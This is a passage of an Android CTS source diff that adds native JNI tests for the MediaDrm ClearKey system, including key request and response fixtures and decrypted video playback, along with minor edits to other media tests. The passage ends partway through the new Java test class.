+static const uint8_t kWidevineUuid[kUuidSize] = {
+ 0xed, 0xef, 0x8b, 0xa9, 0x79, 0xd6, 0x4a, 0xce,
+ 0xa3, 0xc8, 0x27, 0xdc, 0xd5, 0x1d, 0x21, 0xed
+};
+
+// The test content is not packaged with clearkey UUID,
+// we have to use a canned clearkey pssh for the test.
+static const uint8_t kClearkeyPssh[] = {
+ // BMFF box header (4 bytes size + 'pssh')
+ 0x00, 0x00, 0x00, 0x34, 0x70, 0x73, 0x73, 0x68,
+ // full box header (version = 1 flags = 0)
+ 0x01, 0x00, 0x00, 0x00,
+ // system id
+ 0x10, 0x77, 0xef, 0xec, 0xc0, 0xb2, 0x4d, 0x02,
+ 0xac, 0xe3, 0x3c, 0x1e, 0x52, 0xe2, 0xfb, 0x4b,
+ // number of key ids
+ 0x00, 0x00, 0x00, 0x01,
+ // key id
+ 0x60, 0x06, 0x1e, 0x01, 0x7e, 0x47, 0x7e, 0x87,
+ 0x7e, 0x57, 0xd0, 0x0d, 0x1e, 0xd0, 0x0d, 0x1e,
+ // size of data, must be zero
+ 0x00, 0x00, 0x00, 0x00
+};
+
+static const uint8_t kKeyRequestData[] = {
+ 0x7b, 0x22, 0x6b, 0x69, 0x64,
+ 0x73, 0x22, 0x3a, 0x5b, 0x22,
+ 0x59, 0x41, 0x59, 0x65, 0x41,
+ 0x58, 0x35, 0x48, 0x66, 0x6f,
+ 0x64, 0x2b, 0x56, 0x39, 0x41,
+ 0x4e, 0x48, 0x74, 0x41, 0x4e,
+ 0x48, 0x67, 0x22, 0x5d, 0x2c,
+ 0x22, 0x74, 0x79, 0x70, 0x65,
+ 0x22, 0x3a, 0x22, 0x74, 0x65,
+ 0x6d, 0x70, 0x6f, 0x72, 0x61,
+ 0x72, 0x79, 0x22, 0x7d,
+};
+
+static const size_t kKeyRequestSize = sizeof(kKeyRequestData);
+
+// base 64 encoded JSON response string, must not contain padding character '='
+static const char kResponse[] = "{\"keys\":[{\"kty\":\"oct\"," \
+ "\"kid\":\"YAYeAX5Hfod+V9ANHtANHg\",\"k\":" \
+ "\"GoogleTestKeyBase64ggg\"}]}";
+
+static bool isUuidSizeValid(Uuid uuid) {
+ return (uuid.size() == kUuidSize);
+}
+
+static std::vector<uint8_t> jbyteArrayToVector(
+ JNIEnv* env, jbyteArray const &byteArray) {
+ uint8_t* buffer = reinterpret_cast<uint8_t*>(
+ env->GetByteArrayElements(byteArray, /*is_copy*/NULL));
+ std::vector<uint8_t> vector;
+ for (jsize i = 0; i < env->GetArrayLength(byteArray); ++i) {
+ vector.push_back(buffer[i]);
+ }
+ return vector;
+}
+
+static Uuid jbyteArrayToUuid(JNIEnv* env, jbyteArray const &uuid) {
+ Uuid juuid;
+ juuid.resize(0);
+ if (uuid != NULL) {
+ juuid = jbyteArrayToVector(env, uuid);
+ }
+ return juuid;
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest_isCryptoSchemeSupportedNative(
+ JNIEnv* env, jclass /*clazz*/, jbyteArray uuid) {
+
+ if (NULL == uuid) {
+ jniThrowException(env, "java/lang/NullPointerException", "null uuid");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (isUuidSizeValid(juuid)) {
+ return AMediaDrm_isCryptoSchemeSupported(&juuid[0], NULL);
+ } else {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ }
+ return JNI_FALSE;
+}
+
+void initPlaybackParams(JNIEnv* env, const jobject &playbackParams, PlaybackParams ¶ms) {
+ params.surface = env->GetObjectField(
+ playbackParams, gFieldIds.surface);
+
+ params.mimeType = static_cast<jstring>(env->GetObjectField(
+ playbackParams, gFieldIds.mimeType));
+
+ params.audioUrl = static_cast<jstring>(env->GetObjectField(
+ playbackParams, gFieldIds.audioUrl));
+
+ params.videoUrl = static_cast<jstring>(env->GetObjectField(
+ playbackParams, gFieldIds.videoUrl));
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest_testGetPropertyStringNative(
+ JNIEnv* env, jclass clazz, jbyteArray uuid,
+ jstring name, jobject outValue) {
+
+ if (NULL == uuid || NULL == name || NULL == outValue) {
+ jniThrowException(env, "java/lang/NullPointerException",
+ "One or more null input parameters");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (!isUuidSizeValid(juuid)) {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ return JNI_FALSE;
+ }
+
+ AMediaObjects aMediaObjects;
+ aMediaObjects.setDrm(AMediaDrm_createByUUID(&juuid[0]));
+ if (NULL == aMediaObjects.getDrm()) {
+ jniThrowException(env, "java/lang/RuntimeException", "null MediaDrm");
+ return JNI_FALSE;
+ }
+
+ const char *utf8_name = env->GetStringUTFChars(name, NULL);
+ const char *utf8_outValue = NULL;
+ media_status_t status = AMediaDrm_getPropertyString(aMediaObjects.getDrm(),
+ utf8_name, &utf8_outValue);
+ env->ReleaseStringUTFChars(name, utf8_name);
+
+ if (NULL != utf8_outValue) {
+ clazz = env->GetObjectClass(outValue);
+ jmethodID mId = env->GetMethodID (clazz, "append",
+ "(Ljava/lang/String;)Ljava/lang/StringBuffer;");
+ jstring outString = env->NewStringUTF(
+ static_cast<const char *>(utf8_outValue));
+ env->CallObjectMethod(outValue, mId, outString);
+ } else {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "get property string returns %d", status);
+ return JNI_FALSE;
+ }
+ return JNI_TRUE;
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest__testPsshNative(
+ JNIEnv* env, jclass /*clazz*/, jbyteArray uuid, jstring videoUrl) {
+
+ if (NULL == uuid || NULL == videoUrl) {
+ jniThrowException(env, "java/lang/NullPointerException",
+ "null uuid or null videoUrl");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (!isUuidSizeValid(juuid)) {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ return JNI_FALSE;
+ }
+
+ AMediaObjects aMediaObjects;
+ aMediaObjects.setVideoExtractor(AMediaExtractor_new());
+ const char* url = env->GetStringUTFChars(videoUrl, 0);
+ if (url) {
+ media_status_t status = AMediaExtractor_setDataSource(
+ aMediaObjects.getVideoExtractor(), url);
+ env->ReleaseStringUTFChars(videoUrl, url);
+
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "set video data source error=%d", status);
+ return JNI_FALSE;
+ }
+ }
+
+ PsshInfo* psshInfo = AMediaExtractor_getPsshInfo(aMediaObjects.getVideoExtractor());
+ if (psshInfo == NULL) {
+ jniThrowException(env, "java/lang/RuntimeException", "null psshInfo");
+ return JNI_FALSE;
+ }
+
+ jboolean testResult = JNI_FALSE;
+ for (size_t i = 0; i < psshInfo->numentries; i++) {
+ PsshEntry *entry = &psshInfo->entries[i];
+
+ // We do not have clearkey content that contains ClearKey UUID in the
+ // pssh box. So we have to test if it has Widevine UUID instead.
+ // TODO: Replace kWidevineUuid with uuid when test content contains
+ // ClearKey UUID.
+ if (0 == memcmp(entry->uuid, kWidevineUuid, sizeof(entry->uuid))) {
+ aMediaObjects.setCrypto(
+ AMediaCrypto_new(entry->uuid, entry->data, entry->datalen));
+ if (aMediaObjects.getCrypto()) {
+ testResult = JNI_TRUE;
+ } else {
+ ALOGE("Failed to create media crypto=%zd", i);
+ testResult = JNI_FALSE;
+ }
+ break;
+ }
+ }
+ return testResult;
+}
+
+static bool isVideo(const char* mime) {
+ return !strncmp(mime, "video/", 6) ? true : false;
+}
+
+static bool isAudio(const char* mime) {
+ return !strncmp(mime, "audio/", 6) ? true : false;
+}
+
+static void addTrack(const AMediaFormat* format,
+ const char* mime, const AMediaCrypto* crypto,
+ const ANativeWindow* window, AMediaCodec** codec) {
+
+ *codec = AMediaCodec_createDecoderByType(mime);
+ if (codec == NULL) {
+ ALOGE("cannot create codec for %s", mime);
+ return;
+ }
+
+ AMediaCodec_configure(*codec, format,
+ const_cast<ANativeWindow*>(window),
+ const_cast<AMediaCrypto*>(crypto), 0);
+}
+
+static void addTracks(const AMediaExtractor* extractor,
+ const AMediaCrypto* crypto, const ANativeWindow* window,
+ AMediaCodec** codec) {
+ size_t numTracks = AMediaExtractor_getTrackCount(
+ const_cast<AMediaExtractor*>(extractor));
+ AMediaFormat* trackFormat = NULL;
+ for (size_t i = 0; i < numTracks; ++i) {
+ trackFormat = AMediaExtractor_getTrackFormat(
+ const_cast<AMediaExtractor*>(extractor), i);
+ if (trackFormat) {
+ ALOGV("track %zd format: %s", i,
+ AMediaFormat_toString(trackFormat));
+
+ const char* mime = "";
+ if (!AMediaFormat_getString(
+ trackFormat, AMEDIAFORMAT_KEY_MIME, &mime)) {
+ ALOGE("no mime type");
+ AMediaFormat_delete(trackFormat);
+ return;
+ } else if (isAudio(mime) || isVideo(mime)) {
+ AMediaExtractor_selectTrack(
+ const_cast<AMediaExtractor*>(extractor), i);
+ ALOGV("track %zd codec format: %s", i,
+ AMediaFormat_toString(trackFormat));
+
+ addTrack(trackFormat, mime, crypto, window, codec);
+ AMediaCodec_start(*codec);
+ AMediaCodec_flush(*codec);
+ AMediaExtractor_seekTo(
+ const_cast<AMediaExtractor*>(extractor), 0,
+ AMEDIAEXTRACTOR_SEEK_PREVIOUS_SYNC);
+ }
+ AMediaFormat_delete(trackFormat);
+ }
+ }
+}
+
+static int64_t getSystemNanoTime() {
+ timespec now;
+ clock_gettime(CLOCK_MONOTONIC, &now);
+ return now.tv_sec * 1000000000LL + now.tv_nsec;
+}
+
+static void fillDecoder(AMediaCodec* codec, AMediaExtractor* extractor,
+ int64_t* presentationTimeUs, bool* eosReached) {
+ media_status_t status = AMEDIA_OK;
+
+ ssize_t bufferIndex = AMediaCodec_dequeueInputBuffer(codec, 2000);
+ if (bufferIndex >= 0) {
+ size_t bufsize;
+ uint8_t* buf = AMediaCodec_getInputBuffer(codec, bufferIndex, &bufsize);
+
+ int sampleSize = AMediaExtractor_readSampleData(extractor, buf, bufsize);
+ if (sampleSize < 0) {
+ sampleSize = 0;
+ *eosReached = true;
+ }
+
+ *presentationTimeUs = AMediaExtractor_getSampleTime(extractor);
+
+ AMediaCodecCryptoInfo *cryptoInfo =
+ AMediaExtractor_getSampleCryptoInfo(extractor);
+ if (cryptoInfo) {
+ status = AMediaCodec_queueSecureInputBuffer(
+ codec, bufferIndex, 0, cryptoInfo,
+ *presentationTimeUs,
+ *eosReached ? AMEDIACODEC_BUFFER_FLAG_END_OF_STREAM : 0);
+ AMediaCodecCryptoInfo_delete(cryptoInfo);
+ } else {
+ status = AMediaCodec_queueInputBuffer(
+ codec, bufferIndex, 0, sampleSize,
+ *presentationTimeUs,
+ *eosReached ? AMEDIACODEC_BUFFER_FLAG_END_OF_STREAM : 0);
+ }
+ AMediaExtractor_advance(extractor);
+ }
+}
+
+static bool drainDecoder(AMediaCodec* codec, int64_t presentationTimeUs,
+ int64_t* startTimeNano) {
+
+ AMediaCodecBufferInfo info;
+ ssize_t bufferIndex = AMediaCodec_dequeueOutputBuffer(codec, &info, 0);
+ if (bufferIndex >= 0) {
+ if (info.flags & AMEDIACODEC_BUFFER_FLAG_END_OF_STREAM) {
+ return true; // eos reached
+ }
+
+ if (*startTimeNano < 0) {
+ *startTimeNano = getSystemNanoTime() - (presentationTimeUs * 1000);
+ }
+ int64_t delay = (*startTimeNano + presentationTimeUs * 1000) -
+ getSystemNanoTime();
+ if (delay > 0) {
+ usleep(delay / 1000);
+ }
+
+ AMediaCodec_releaseOutputBuffer(codec, bufferIndex, info.size != 0);
+ } else if (bufferIndex == AMEDIACODEC_INFO_OUTPUT_BUFFERS_CHANGED) {
+ ALOGV("output buffers changed");
+ } else if (bufferIndex == AMEDIACODEC_INFO_OUTPUT_FORMAT_CHANGED) {
+ AMediaFormat* format = AMediaCodec_getOutputFormat(codec);
+ ALOGV("format changed to: %s", AMediaFormat_toString(format));
+ AMediaFormat_delete(format);
+ } else if (bufferIndex == AMEDIACODEC_INFO_TRY_AGAIN_LATER) {
+ ALOGV("no output buffer right now");
+ usleep(20000);
+ } else {
+ ALOGV("unexpected info code: %zd", bufferIndex);
+ }
+ return false;
+}
+
+static jboolean playContent(JNIEnv* env, const AMediaObjects& aMediaObjects,
+ PlaybackParams& params, const AMediaDrmSessionId& sessionId, Uuid uuid) {
+
+ ANativeWindow *window = ANativeWindow_fromSurface(env, params.surface);
+ AMediaExtractor* audioExtractor = aMediaObjects.getAudioExtractor();
+ AMediaExtractor* videoExtractor = aMediaObjects.getVideoExtractor();
+
+ AMediaCodec* audioCodec = NULL;
+ AMediaCodec* videoCodec = NULL;
+ AMediaCrypto* crypto = NULL;
+
+ crypto = AMediaCrypto_new(&uuid[0], sessionId.ptr, sessionId.length);
+ if (crypto == NULL) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "failed to create crypto object");
+ return JNI_FALSE;
+ }
+
+ addTracks(audioExtractor, NULL, NULL, &audioCodec);
+ addTracks(videoExtractor, crypto, window, &videoCodec);
+
+ bool sawAudioInputEos = false;
+ bool sawAudioOutputEos = false;
+ bool sawVideoInputEos = false;
+ bool sawVideoOutputEos = false;
+ int64_t videoPresentationTimeUs = 0;
+ int64_t videoStartTimeNano = -1;
+ struct timespec timeSpec;
+ clock_gettime(CLOCK_MONOTONIC, &timeSpec);
+ time_t startTimeSec = timeSpec.tv_sec;
+
+ while (!sawAudioOutputEos && !sawVideoOutputEos) {
+ if (!sawVideoInputEos) {
+ fillDecoder(videoCodec, videoExtractor,
+ &videoPresentationTimeUs, &sawVideoInputEos);
+ }
+
+ if (!sawAudioInputEos) {
+ // skip audio, still need to advance the audio extractor
+ AMediaExtractor_advance(audioExtractor);
+ }
+
+ if (!sawVideoOutputEos) {
+ sawVideoOutputEos = drainDecoder(videoCodec, videoPresentationTimeUs,
+ &videoStartTimeNano);
+ }
+
+ clock_gettime(CLOCK_MONOTONIC, &timeSpec);
+ if (timeSpec.tv_sec >= static_cast<time_t>(
+ (startTimeSec + kPlayTimeSeconds))) {
+ // stop reading samples and drain the output buffers
+ sawAudioInputEos = sawVideoInputEos = true;
+ sawAudioOutputEos = true; // ignore audio
+ }
+ }
+
+ if (audioCodec) {
+ AMediaCodec_stop(audioCodec);
+ AMediaCodec_delete(audioCodec);
+ }
+ if (videoCodec) {
+ AMediaCodec_stop(videoCodec);
+ AMediaCodec_delete(videoCodec);
+ }
+
+ AMediaCrypto_delete(crypto);
+ ANativeWindow_release(window);
+ return JNI_TRUE;
+}
+
+static void listener(
+ AMediaDrm* /*drm*/, const AMediaDrmSessionId* /*sessionId*/,
+ AMediaDrmEventType eventType,
+ int /*extra*/, const uint8_t* /*data*/, size_t /*dataSize*/) {
+
+ switch (eventType) {
+ case EVENT_PROVISION_REQUIRED:
+ ALOGD("EVENT_PROVISION_REQUIRED received");
+ break;
+ case EVENT_KEY_REQUIRED:
+ ALOGD("EVENT_KEY_REQUIRED received");
+ break;
+ case EVENT_KEY_EXPIRED:
+ ALOGD("EVENT_KEY_EXPIRED received");
+ break;
+ case EVENT_VENDOR_DEFINED:
+ gGotVendorDefinedEvent = true;
+ ALOGD("EVENT_VENDOR_DEFINED received");
+ break;
+ default:
+ ALOGD("Unknown event received");
+ break;
+ }
+}
+
+extern "C" jboolean Java_android_media_cts_NativeClearKeySystemTest_testClearKeyPlaybackNative(
+ JNIEnv* env, jclass /*clazz*/, jbyteArray uuid, jobject playbackParams) {
+ if (NULL == uuid || NULL == playbackParams) {
+ jniThrowException(env, "java/lang/NullPointerException",
+ "null uuid or null playback parameters");
+ return JNI_FALSE;
+ }
+
+ Uuid juuid = jbyteArrayToUuid(env, uuid);
+ if (!isUuidSizeValid(juuid)) {
+ jniThrowExceptionFmt(env, "java/lang/IllegalArgumentException",
+ "invalid UUID size, expected %u bytes", kUuidSize);
+ return JNI_FALSE;
+ }
+
+ PlaybackParams params;
+ initPlaybackParams(env, playbackParams, params);
+
+ AMediaObjects aMediaObjects;
+ media_status_t status = AMEDIA_OK;
+ aMediaObjects.setDrm(AMediaDrm_createByUUID(&juuid[0]));
+ if (NULL == aMediaObjects.getDrm()) {
+ jniThrowException(env, "java/lang/RuntimeException", "null MediaDrm");
+ return JNI_FALSE;
+ }
+
+ status = AMediaDrm_setOnEventListener(aMediaObjects.getDrm(), listener);
+ if (status != AMEDIA_OK) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "setOnEventListener failed");
+ return JNI_FALSE;
+ }
+
+ aMediaObjects.setAudioExtractor(AMediaExtractor_new());
+ const char* url = env->GetStringUTFChars(params.audioUrl, 0);
+ if (url) {
+ status = AMediaExtractor_setDataSource(
+ aMediaObjects.getAudioExtractor(), url);
+ env->ReleaseStringUTFChars(params.audioUrl, url);
+
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "set audio data source error=%d", status);
+ return JNI_FALSE;
+ }
+ }
+
+ aMediaObjects.setVideoExtractor(AMediaExtractor_new());
+ url = env->GetStringUTFChars(params.videoUrl, 0);
+ if (url) {
+ status = AMediaExtractor_setDataSource(
+ aMediaObjects.getVideoExtractor(), url);
+ env->ReleaseStringUTFChars(params.videoUrl, url);
+
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "set video data source error=%d", status);
+ return JNI_FALSE;
+ }
+ }
+
+ AMediaDrmSessionId sessionId;
+ status = AMediaDrm_openSession(aMediaObjects.getDrm(), &sessionId);
+ if (status != AMEDIA_OK) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "openSession failed");
+ return JNI_FALSE;
+ }
+
+ // Pointer to keyRequest memory, which remains until the next
+ // AMediaDrm_getKeyRequest call or until the drm object is released.
+ const uint8_t* keyRequest;
+ size_t keyRequestSize = 0;
+
+ // The server recognizes "video/mp4" but not "video/avc".
+ status = AMediaDrm_getKeyRequest(aMediaObjects.getDrm(), &sessionId,
+ kClearkeyPssh, sizeof(kClearkeyPssh),
+ "video/mp4" /*mimeType*/, KEY_TYPE_STREAMING,
+ NULL, 0, &keyRequest, &keyRequestSize);
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "getKeyRequest failed, error = %d", status);
+ AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ return JNI_FALSE;
+ }
+
+ if (kKeyRequestSize != keyRequestSize) {
+ ALOGE("Invalid keyRequestSize %zd", keyRequestSize);
+ return JNI_FALSE;
+ }
+
+ if (memcmp(kKeyRequestData, keyRequest, kKeyRequestSize) != 0) {
+ ALOGE("Invalid keyRequest data is returned");
+ return JNI_FALSE;
+ }
+
+ AMediaDrmKeySetId keySetId;
+ gGotVendorDefinedEvent = false;
+ status = AMediaDrm_provideKeyResponse(aMediaObjects.getDrm(), &sessionId,
+ reinterpret_cast<const uint8_t*>(kResponse),
+ sizeof(kResponse), &keySetId);
+ if (status != AMEDIA_OK) {
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "provideKeyResponse failed, error = %d", status);
+ AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ return JNI_FALSE;
+ }
+
+ // Check if the event listener has received the expected event sent by
+ // provideKeyResponse. This is for testing AMediaDrm_setOnEventListener().
+ const char *utf8_outValue = NULL;
+ status = AMediaDrm_getPropertyString(aMediaObjects.getDrm(),
+ "listenerTestSupport", &utf8_outValue);
+ if (status == AMEDIA_OK && NULL != utf8_outValue) {
+ std::string eventType(utf8_outValue);
+ if (eventType.compare("true") == 0) {
+ int count = 0;
+ while (!gGotVendorDefinedEvent && count++ < 5) {
+ // Prevents race condition when the event arrives late
+ usleep(1000);
+ }
+ if (!gGotVendorDefinedEvent) {
+ ALOGE("Event listener did not receive the expected event.");
+ jniThrowExceptionFmt(env, "java/lang/RuntimeException",
+ "Event listener did not receive the expected event.");
+ AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ return JNI_FALSE;
+ }
+ }
+ }
+
+ playContent(env, aMediaObjects, params, sessionId, juuid);
+
+ status = AMediaDrm_closeSession(aMediaObjects.getDrm(), &sessionId);
+ if (status != AMEDIA_OK) {
+ jniThrowException(env, "java/lang/RuntimeException",
+ "closeSession failed");
+ return JNI_FALSE;
+ }
+ return JNI_TRUE;
+}
+
+static JNINativeMethod gMethods[] = {
+ { "isCryptoSchemeSupportedNative", "([B)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest_isCryptoSchemeSupportedNative },
+
+ { "testClearKeyPlaybackNative",
+ "([BLandroid/media/cts/NativeClearKeySystemTest$PlaybackParams;)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest_testClearKeyPlaybackNative },
+
+ { "testGetPropertyStringNative",
+ "([BLjava/lang/String;Ljava/lang/StringBuffer;)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest_testGetPropertyStringNative },
+
+ { "testPsshNative", "([BLjava/lang/String;)Z",
+ (void *)Java_android_media_cts_NativeClearKeySystemTest__testPsshNative },
+};
+
+int register_android_media_cts_NativeClearKeySystemTest(JNIEnv* env) {
+ jint result = JNI_ERR;
+ jclass testClass =
+ env->FindClass("android/media/cts/NativeClearKeySystemTest");
+ if (testClass) {
+ jclass playbackParamsClass = env->FindClass(
+ "android/media/cts/NativeClearKeySystemTest$PlaybackParams");
+ if (playbackParamsClass) {
+ jclass surfaceClass =
+ env->FindClass("android/view/Surface");
+ if (surfaceClass) {
+ gFieldIds.surface = env->GetFieldID(playbackParamsClass,
+ "surface", "Landroid/view/Surface;");
+ } else {
+ gFieldIds.surface = NULL;
+ }
+ gFieldIds.mimeType = env->GetFieldID(playbackParamsClass,
+ "mimeType", "Ljava/lang/String;");
+ gFieldIds.audioUrl = env->GetFieldID(playbackParamsClass,
+ "audioUrl", "Ljava/lang/String;");
+ gFieldIds.videoUrl = env->GetFieldID(playbackParamsClass,
+ "videoUrl", "Ljava/lang/String;");
+ } else {
+ ALOGE("PlaybackParams class not found");
+ }
+
+ } else {
+ ALOGE("NativeClearKeySystemTest class not found");
+ }
+
+ result = env->RegisterNatives(testClass, gMethods,
+ sizeof(gMethods) / sizeof(JNINativeMethod));
+ return result;
+}
diff --git a/tests/tests/media/src/android/media/cts/ConnectionStatus.java b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
index 407e553..37fc75e 100644
--- a/tests/tests/media/src/android/media/cts/ConnectionStatus.java
+++ b/tests/tests/media/src/android/media/cts/ConnectionStatus.java
@@ -132,14 +132,6 @@
}
public void testConnection(Uri uri) {
- final String GOOG = "www.google.com";
-
- if (pingTest(GOOG)) {
- Log.d(TAG, "Successfully pinged " + GOOG);
- } else {
- Log.e(TAG, "Failed to ping " + GOOG);
- }
-
if (pingTest(uri.getHost())) {
Log.d(TAG, "Successfully pinged " + uri.getHost());
} else {
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index e7b8adf..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,10 +19,7 @@
import android.annotation.TargetApi;
import android.content.Context;
-import android.cts.util.MediaUtils;
import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
import android.util.Log;
import android.view.View;
@@ -139,23 +136,17 @@
private void runH264DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
}
private void runVP9DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
}
private void runH264DecodeCroppedTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
}
private void runDecodeAccuracyTest(
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 3cbfdbf..2d38933 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,18 @@
return 1;
}
+ public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+ if (!hasMicrophone() || !hasAmrNb()) {
+ MediaUtils.skipTest("no audio codecs or microphone");
+ return;
+ }
+ mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+ mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+ mMediaRecorder.setOutputFile(OUTPUT_PATH);
+ mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+ recordMedia(MAX_FILE_SIZE, mOutFile);
+ }
+
public void testGetAudioSourceMax() throws Exception {
final int max = MediaRecorder.getAudioSourceMax();
assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
new file mode 100644
index 0000000..1d4500f
--- /dev/null
+++ b/tests/tests/media/src/android/media/cts/NativeClearKeySystemTest.java
@@ -0,0 +1,267 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.media.cts;
+
+import static org.junit.Assert.assertThat;
+import static org.junit.matchers.JUnitMatchers.containsString;
+
+import android.cts.util.MediaUtils;
+import android.net.Uri;
+import android.util.Log;
+import android.view.Surface;
+import android.view.SurfaceHolder;
+
+import com.google.android.collect.Lists;
+
+import java.nio.ByteBuffer;
+import java.util.ArrayList;
+import java.util.Iterator;
+import java.util.UUID;
+
+/**
+ * Tests MediaDrm NDK APIs. ClearKey system uses a subset of NDK APIs,
+ * this test only tests the APIs that are supported by ClearKey system.
+ */
+public class NativeClearKeySystemTest extends MediaPlayerTestBase {
+ private static final String TAG = NativeClearKeySystemTest.class.getSimpleName();
+
+ private static final int CONNECTION_RETRIES = 10;
+ private static final int VIDEO_WIDTH_CENC = 1280;
+ private static final int VIDEO_HEIGHT_CENC = 720;
+ private static final String ISO_BMFF_VIDEO_MIME_TYPE = "video/avc";
+ private static final String ISO_BMFF_AUDIO_MIME_TYPE = "audio/avc";
+ private static final Uri CENC_AUDIO_URL = Uri.parse(
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-8c.mp4");
+ private static final Uri CENC_CLEARKEY_VIDEO_URL = Uri.parse(
+ "http://yt-dash-mse-test.commondatastorage.googleapis.com/media/" +
+ "car_cenc-20120827-88.mp4");
+
+ private static final int UUID_BYTE_SIZE = 16;
+ private static final UUID CLEARKEY_SCHEME_UUID =
+ new UUID(0x1077efecc0b24d02L, 0xace33c1e52e2fb4bL);
+ private static final UUID BAD_SCHEME_UUID =
+ new UUID(0xffffffffffffffffL, 0xffffffffffffffffL);
+ private MediaCodecClearKeyPlayer mMediaCodecPlayer;
+
+ static {
+ try {
+ System.loadLibrary("ctsmediadrm_jni");
+ } catch (UnsatisfiedLinkError e) {
+ Log.e(TAG, "NativeClearKeySystemTest: Error loading JNI library");
+ e.printStackTrace();
+ }
+ try {
+ System.loadLibrary("mediandk");
+ } catch (UnsatisfiedLinkError e) {
+ Log.e(TAG, "NativeClearKeySystemTest: Error loading JNI library");
+ e.printStackTrace();
+ }
+ }
+
+ public static class PlaybackParams {
+ public Surface surface;
+ public String mimeType;
+ public String audioUrl;
+ public String videoUrl;
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ if (false == deviceHasMediaDrm()) {
+ tearDown();
+ }
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ private boolean deviceHasMediaDrm() {
+ // ClearKey is introduced after KitKat.
+ if (android.os.Build.VERSION.SDK_INT <= android.os.Build.VERSION_CODES.KITKAT) {
+ Log.i(TAG, "This test is designed to work after Android KitKat.");
+ return false;
+ }
+ return true;
+ }
+
+ private static final byte[] uuidByteArray(UUID uuid) {
+ ByteBuffer buffer = ByteBuffer.wrap(new byte[UUID_BYTE_SIZE]);
+ buffer.putLong(uuid.getMostSignificantBits());
+ buffer.putLong(uuid.getLeastSignificantBits());
+ return buffer.array();
+ }
+
+ public void testIsCryptoSchemeSupported() throws Exception {
